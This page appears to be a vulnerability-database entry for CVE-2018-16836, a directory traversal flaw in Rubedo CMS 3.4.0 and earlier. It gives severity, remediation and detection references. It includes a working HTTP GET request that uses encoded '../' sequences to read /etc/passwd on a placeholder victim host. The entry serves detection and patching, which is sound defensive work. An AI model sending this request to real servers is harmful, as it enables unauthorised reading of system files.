🔙 목록으로 돌아가기

CVE-2018-16836: Rubedo CMS <=3.4.0 - Directory Traversal

TitleRubedo CMS <=3.4.0 - Directory Traversal
Author0x_Akoko
SeverityCritical
ImpactAn attacker can exploit this vulnerability to read arbitrary files on the server.
RemediationUpgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch.
CVSS Score9.8
EPSS Score0.87379
CVE IDCVE-2018-16836
CWE IDCWE-22
Tags cve2018 cve rubedo lfi edb rubedo_project vkev vuln

🔍 Vulnerability Description

Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.

🌐 HTTP Request

GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16836.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-16836.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A